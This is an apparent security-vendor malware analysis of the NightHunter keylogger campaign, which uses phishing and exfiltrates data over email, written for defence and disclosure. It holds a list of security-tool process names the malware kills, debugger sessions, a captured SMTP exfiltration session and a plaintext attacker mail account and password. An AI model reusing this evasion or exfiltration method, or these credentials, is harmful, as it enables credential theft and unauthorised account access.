Cyphort Labs discovered an extensive data theft campaign. It involves several different malware keyloggers, including Predator Pain, Limitless, Spyrex and others. The unifying feature is that they all use SMTP (email) for data exfiltration. Email to social networking is like snail-mail is to email, it is outdated and often overlooked, so it can be a more stealthy way of data theft. So we called it NightHunter.
NightHunter is very aggressive at stealing and sending home the users’ passwords. The actors behind NightHunter could use the trove of stolen credentials to leverage big data analytics to enable new cyber threats, for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.
Our investigation started with a sample delivered through a phishing email. It is a .Net binary and when executed it steals user’s credentials and sends them to a remote email server. It seems like a naive technique to most of the existing “advanced” security products. We started to look into the sample and found additional “similar” samples and examined the data it exfiltrated to the remote servers.
The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals and charities and other enterprises.
Common Delivery Mechanism:
These samples are delivered mostly through phishing emails. These emails are sent with DOC/ZIP/RAR attachments. You can get infected by opening a malicious document with scripting enabled. Most of the phishing emails are mostly targeted towards personnel in finance/sales/HR departments. Sometimes actors may act as goods resale agents. We have seen cases where it was bundled with fake IDM/7zip installers. Most of these samples use keylogger tools to sniff data from the victim.
Most common Phishing Email subject/attachment names:
- WireSlip
- Jobs List
- PO
- Reconfirm Pls
- Purchase Order
- Payment Slip
- Order
- Inquiry
- Remittance Payment Slip
Types of Stolen Credentials:
- Dropbox
- Yahoo
- Hotmail
- Amazon
- Skype
- Banks
- Rediff
Victims Industries:
- Oil industry
- Charities
- Educational Institutes
- Hospitals
- Departmental Stores
- Auditors
- Export/Import Companies.
- Insurance Companies
- TV Network
- Trading Companies
List of keylogger malware used:
- Limitless logger lite (http://limitlessproducts.org/)
- Predator Pain
- Keylogger Logları (SlloTBan)
- Spyrex
- FEDERIKO\’s Logger
- Unknown Logger Public
- Aux Logger
- Neptune
- Clyde Logger
- Ultimate Logger
- MY Ultimate Jobe
- Syslogger
- Syndicate Logger (http://syndicateproducts.org)
We are seeing Limitless keylogger many places. Next to the Limitless logger, Predator Pain is popular within the actors. Considering the low cost of the tool, easy setup, quality of virus generator and features it supports, we are seeing increasing interest with the actors. Though Limitless Logger is closed down, it was used heavily.
Most of the keyloggers used provide following features:
– E-Mail/PHP/FTP upload
– Obfuscation
– Spoof Extension and Change Icon
– Clear Browser Data
– Fake Error Message
– Capture Screenshot
– Disable many programs
– Various spreading mechanism
– File Downloader
– Block various websites
– Self-delete
Data Stealing:
– Bitcoin Stealing
– Password managers
- Firefox/Google Chrome/IE/Safari/Opera
– Outlook
– Pidgin/Trillian/Paltalk/AIM/IMVU
– Various Games and Game Bots
– Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander
One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.
List of Email servers and Number of samples using particular Email server:
|
Email Server |
Sample Count |
First Seen |
Last seen |
|
smtp.googlemail.com/smtp.gmail.com |
300k |
2009 |
Today |
|
smtp.mail.ru |
228 |
2010-10-08 |
2014-06-13 |
|
smtp.live.com |
151 |
2010-08-24 |
2014-06-12 |
|
mx1.3owl.com |
82 |
2012-09-10 |
2014-06-05 |
|
smtp.mail.com |
42 |
2011-04-20 |
2014-06-12 |
|
smtp.yandex.com/smtp.yandex.ru |
39 |
2010-12-20 |
2014-06-12 |
|
smtp.turkceventrilo.com |
38 |
2014-04-02 |
2014-06-04 |
|
smtp.mail.yahoo.com |
25 |
2013-02-15 |
2014-06-13 |
|
mail.drmike.com.de |
31 |
2014-04-06 |
2014-05-29 |
|
smtp.aol.com |
13 |
2010-10-27 |
2014-06-06 |
|
smtp.comcast.net |
18 |
2013-05-31 |
2014-06-12 |
|
smtp-mail.outlook.com |
1 |
2014-05-23 |
|
|
smtp.list.ru |
1 |
2014-06-09 |
|
|
smtp.hanco-ltd.biz |
10 |
2014-04-04 |
2014-06-10 |
|
mail.ieindia.org |
7 |
2014-04-29 |
2014-06-10 |
|
mail.npcuae.com |
1 |
2014-06-08 |
|
|
smtp.bilatraders.com |
1 |
2014-06-04 |
|
|
mail.persian-trading.com |
5 |
2014-05-25 |
2014-06-06 |
|
smtp.poczta.onet.pl |
2 |
2012-06-02 |
2014-06-09 |
|
relay.skynet.be |
1 |
2014-06-04 |
|
|
Smtp.interia.pl |
1 |
2014-06-06 |
|
|
mx.freenet.de |
1 |
2014-06-05 |
|
|
cloud73.dotcanada.com |
2 |
2014-04-29 |
2014-05-30 |
|
smtp.bk.ru |
5 |
2014-04-21 |
2014-05-26 |
|
master.torguard.tg |
3 |
2014-05-16 |
2014-05-23 |
|
poczta.o2.pl |
4 |
2014-03-21 |
2014-05-31 |
|
smtp.web.de |
2 |
2011-07-03 |
2014-04-11 |
|
mail.snookiezinc.com.de |
1 |
2014-03-18 |
|
|
mail.atbinco.com |
2 |
2014-05-09 |
|
|
smtps.bol.com.br |
2 |
2014-04-15 |
2014-05-26 |
|
mail.glintcosmetics.com |
2 |
2014-04-25 |
2014-06-11 |
Gmail seems to be the most popular email server used by the criminals to “park” the victim data in recent times. Probably the reason for larger number of samples that use Gmail is it is quite popular and most of the security products somehow “whitelist” Google/Gmail traffic/activity and it is easy to hide this email in the volume of emails sent out to Gmail. Another possible reason is Gmail imposes a lot of restrictions like how many emails a particular account can send on a particular day and actors have to keep sending new malware with new accounts.
The number of samples the actors sent for other email servers is very low. We believe some of the servers are hacked to create an email account and in some cases actors created their own email server itself. For example, the email server of The Institution of Engineers (ieindia.org) is hacked to create two accounts and used to park the victim data mostly from India. Some of these samples that use private email servers are active for only a few weeks.
Most of the virus generator tools provide various options to exfiltrate data from the victim machine like Email, FTP and PHP upload. Looking at the patterns most of these actors started with PHP upload and then moved to Email. Analyzing recent malware samples reveals that most of the actors started to use only Email. Very few malware samples use multiple methods to exfiltrate the data like FTP and Email.
mx1.3owl.com
|
First Seen Date |
Infection Count |
Keylogger |
|
6/5/2014 |
2 |
Predator Pain |
|
6/4/2014 |
31 |
Predator Pain |
|
6/4/2014 |
47 |
Predator Pain |
|
6/3/2014 |
10 |
Predator Pain |
|
6/3/2014 |
15 |
Predator Pain |
|
6/3/2014 |
33 |
Predator Pain |
|
6/2/2014 |
2 |
Predator Pain |
|
6/2/2014 |
50 |
Predator Pain |
|
6/2/2014 |
2 |
Predator Pain |
|
6/1/2014 |
33 |
Predator Pain |
|
5/30/2014 |
7 |
Predator Pain |
|
5/25/2014 |
44 |
Predator Pain |
|
5/20/2014 |
6 |
Predator Pain |
|
5/17/2014 |
5 |
Mr. Clyde Logger and Predator |
|
5/15/2014 |
26 |
|
|
5/12/2014 |
5 |
Mr. Clyde Logger and Predator |
|
5/11/2014 |
39 |
Predator Pain |
|
5/8/2014 |
59 |
Predator Pain |
|
5/7/2014 |
||
|
5/6/2014 |
6 |
Predator Pain |
|
5/2/2014 |
20 |
Predator Pain, Limitless Logger |
|
4/24/2014 |
37 |
Predator Pain |
|
4/23/2014 |
57 |
Predator Pain, Limitless Logger |
|
4/22/2014 |
57 57 |
Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe |
|
4/17/2014 |
57 57 14 |
Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe Predator Pain |
|
4/16/2014 |
||
|
4/15/2014 |
1 |
Predator Pain |
|
4/10/2014 |
73 |
Predator Pain, Limitless Logger |
|
4/9/2014 |
73 |
Predator Pain, Limitless Logger Limitless Logger |
|
4/5/2014 |
57 |
Predator Pain, Limitless Logger Limitless Logger Predator Pain, Limitless Logger |
|
4/3/2014 |
42 |
|
|
3/27/2014 |
73 |
|
|
2/18/2014 |
1 |
Predator Pain |
|
1/28/2014 |
57 |
Predator Pain, Limitless Logger, MY Ultimate Jobe |
Actors behind these malware samples (35 out of 82) follow the similar techniques while registering domains. Author’s identity is hidden to the analyst.
List of Samples we looked into and related to mx1.3owl.com
62F3DF70D746C898A3A5ACAD1EB6117F
5DAB1479F63376739DFE0F8140F3263E
0C25431D2B13C99AFC0DE7338E9A3ACE
BDC5A619BC2D96616D900DFEBC2D21E7
845EFE43B05A7334B0AE8CB39C6AA4E5
3164A660B54EBE994B467D765465D23C
09423D5E22289F0F8E31FE4FC2DA0A25
416CE138B5F02F00253FC08989A9CD12
DE59FB78752DE040010EDA63667C26CA
CEC37293C2ADF3C9EECA7EE14979BDAD
26D13E5412D282DA91E4053D92B34271
3CE8C9743D9F523009CA84CD3B12B1B8
71AC33835389B800FE5BDB69786A62B8
3831B1FCE2B1CDC662262D389529A298
8117AAA51EE22F13E817F67E7A816F48
28F718CCE2D22F61108B580746CFD810
736A752D2B0B96741213404177DBD8F6
DEFB1E6E42EDC46FA9630CDF42C347F9
5EFF0A000B0B63D67BD3F9BBFB8991D0
207A9A92C697E83B21FC44E4DF0247AD
7D9F321A673266B4BDE3F48CE132A81E
D0D13CDAB7EE6DC22A52FBB0A2FA5F16
31D0DD3ADBE378F8BF3D13FC0BF69D51
C475E64740710B398F458710E7CBF3FD
F4E7CC408B9902A92181BF46282C46DD
0AA6E7204A3DBA4EBE6F81331FF9EF3B
9716665CB4F603C4D1CA96D7CC7A555C
0E4FA8AB9CF7C64714C436735D68E1F0
B699A3FE2B531139FAB267689B3CEF14
B7103ED3D263578FA26E06C9E6ADBD21
A514FCBDF47C0829843A1C03D1061F28
9350F7B4513198F86987F36A8D400D34
AD9A3311486DF3B7B457779EA486BC5D
9A285873E25F43085D9DE5FCA4D898D5
77CF51DA449598A43CF030A7EC9F223E
4BD63A33567A9EAF80D0E0730DE6AB0A
D1683408FEFA12BB93FC15CE2DEDD7C7
7AD0EABC5B9D6F6B1A7BE35B75F68681
mail.ieindia.org:
All the samples related to this email server were active for only a few weeks. This is targeted towards people from India. Actors used Limitless logger to extract the information from the victims. Analyst believe that actors hacked into their email server and created two email accounts to park their data. Victims are from different industries.
|
70b0e2fb1e54d16f96d11685c81071361afb66523c3c81b054344c21df1bd6ec |
2014-06-10 |
|
db3b52afd523055cabcc0df3c9f0eeced65e627fd2f7e2b9d4d8e0f5c6141f42 |
2014-06-03 |
|
8dfdd1f019c2b4c3d4bc9fb6a8e15b7a4cca916a5540c7dae65f83c4ec60b2e7 |
2014-06-02 |
|
9a71df6f73875488754583f53e6caf9c654526fc55c09c4d4b57003788b844c4 |
2014-05-09 |
|
aea5e5650fb857b1675fe68eb7f102e7695322a70defce79f59a72f3f34ea6c4 |
2014-05-29 |
|
75b4e7f2917dd18ce7d2d4a9238b5b8072b997ff2634444d0a43b69acc1f14ea |
2014-05-28 |
|
584e6f7326ee93f1f03cca1014263bcef007fcfa6d527a77cb040b20e165bb4a |
2014-04-29 |
Manual Analysis
Most of the samples we manually analyzed included lot of obfuscation techniques used to delay the analysis. We will be looking at static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples too.
Anti-analysis techniques used:
- Use non-printable characters as a class/variable names in the code.
- Use Assmbly.Load() function to load a different assembly.
- Strings in the code are encoded using various methods. (We found almost 10 different ways used)
- Various product detection code.
- Debugger detection code.
Started to look into the binary using various .Net disassemblers. Most of the disassemblers didn’t work for most of the binaries. Using ILSpy we started to analyze this binary. Internally it decoded another assembly from its resource section and loaded it.
We decided to dump the second stage using the WinDBG. Most of the first stage binary does not use any debugger detection or security product detection code but second stage does.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
PARAMETERS:
this = 0x02851268
rawAssembly = 0x02879c04
LOCALS:
<no data>
0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
PARAMETERS:
this = <no data>
sender = <no data>
e = <no data>
LOCALS:
<no data>
0x0045ed3c = 0x02879c04
0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
…
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes…………….
The second stage binary is again obfuscated. It uses a lot of variables with nonprintable characters. We will not be able to set breakpoints in the windbg. We decided to do dynamic analysis on the binary. This binary tries to persist in the system using autorun registry modification. It first tries to connect to a remote server (depends on the binary) to find the external IP address and sends an Email to remote server.
It connects to a remote email server (mx1.3owl.com) and sends an email with victim information. It uses Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.
Let’s look into other similar binaries that included credentials in plain text in the original sample itself.
MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d
It hides the email credentials at the end of file.
Some binaries look for a few security products installed in the machine. If they find any security products, they hide their own window and kill the security product also.
All this detection looks for particular process name.
AntiKeyscrambler() -> keyscrambler
AntiWireshark() -> wireshark
AntiAnubis() -> anubis
AntiMalwarebytes() -> mbam
AntiKaspersky() -> avp
AntiOllydbg() -> ollydbg
AntiOutpost() -> outpost
AntiNorman() -> npfmsg
AntiBitDefender() -> bdagent
AntiNOD32() -> egui
We used windbg to dump the credentials for some of the samples that did not do debugger detection.
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3 ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods…
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53 push rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii
Most of the binaries used TCP/587 to send emails to the remote server. Some binaries associated with mx1.3owl.com used TCP/2525 to send emails. We retrieved most of the credentials using dynamic analysis including Gmail. Gmail uses encrypted channel to communicate to the remote server. Since the number of samples that uses Gmail is high, we decided to MITM the Gmail traffic in our malware lab.
S->C 53 b’220 mx.google.com ESMTP ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 16 b’EHLO test-PC\r\n’
S->C 137 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’
C->S 10 b’STARTTLS\r\n’
S->C 30 b’220 2.0.0 Ready to start TLS\r\n’
Wrapping sockets.
C->S 16 b’EHLO test-PC\r\n’
S->C 178 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’
C->S 41 b’AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n’
S->C 18 b’334 UGFzc3dvcmQ6\r\n’
C->S 18 b’aGFpbmVyb3NpaQ==\r\n’
S->C 20 b’235 2.7.0 Accepted\r\n’
C->S 34 b’MAIL FROM:<alinsterpu@gmail.com>\r\n’
S->C 42 b’250 2.1.0 OK ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 32 b’RCPT TO:<alinsterpu@gmail.com>\r\n’
S->C 42 b’250 2.1.5 OK ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 6 b’DATA\r\n’
S->C 43 b’354 Go ahead ec2sm20231912pbc.63 – gsmtp\r\n’
C->S 228 b’MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n’
C->S 48 b’keylogger started at: 6/17/2014 1:24:43 AM=0D=0A’
One of the sample we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both Email and FTP to exfiltrate data from the users machine.
Most of the samples used code level obfuscation to delay the analysis. In the end, we got 10 different methods (decoding/decryption) to decode various strings. No wonder these samples are created using similar virus generator tools.
NightHunter is a unique campaign in that it tries to fly under the radar with its email exfiltration but is very aggressive at collecting all sorts of data and credentials from the users including passwords, screenshots, etc.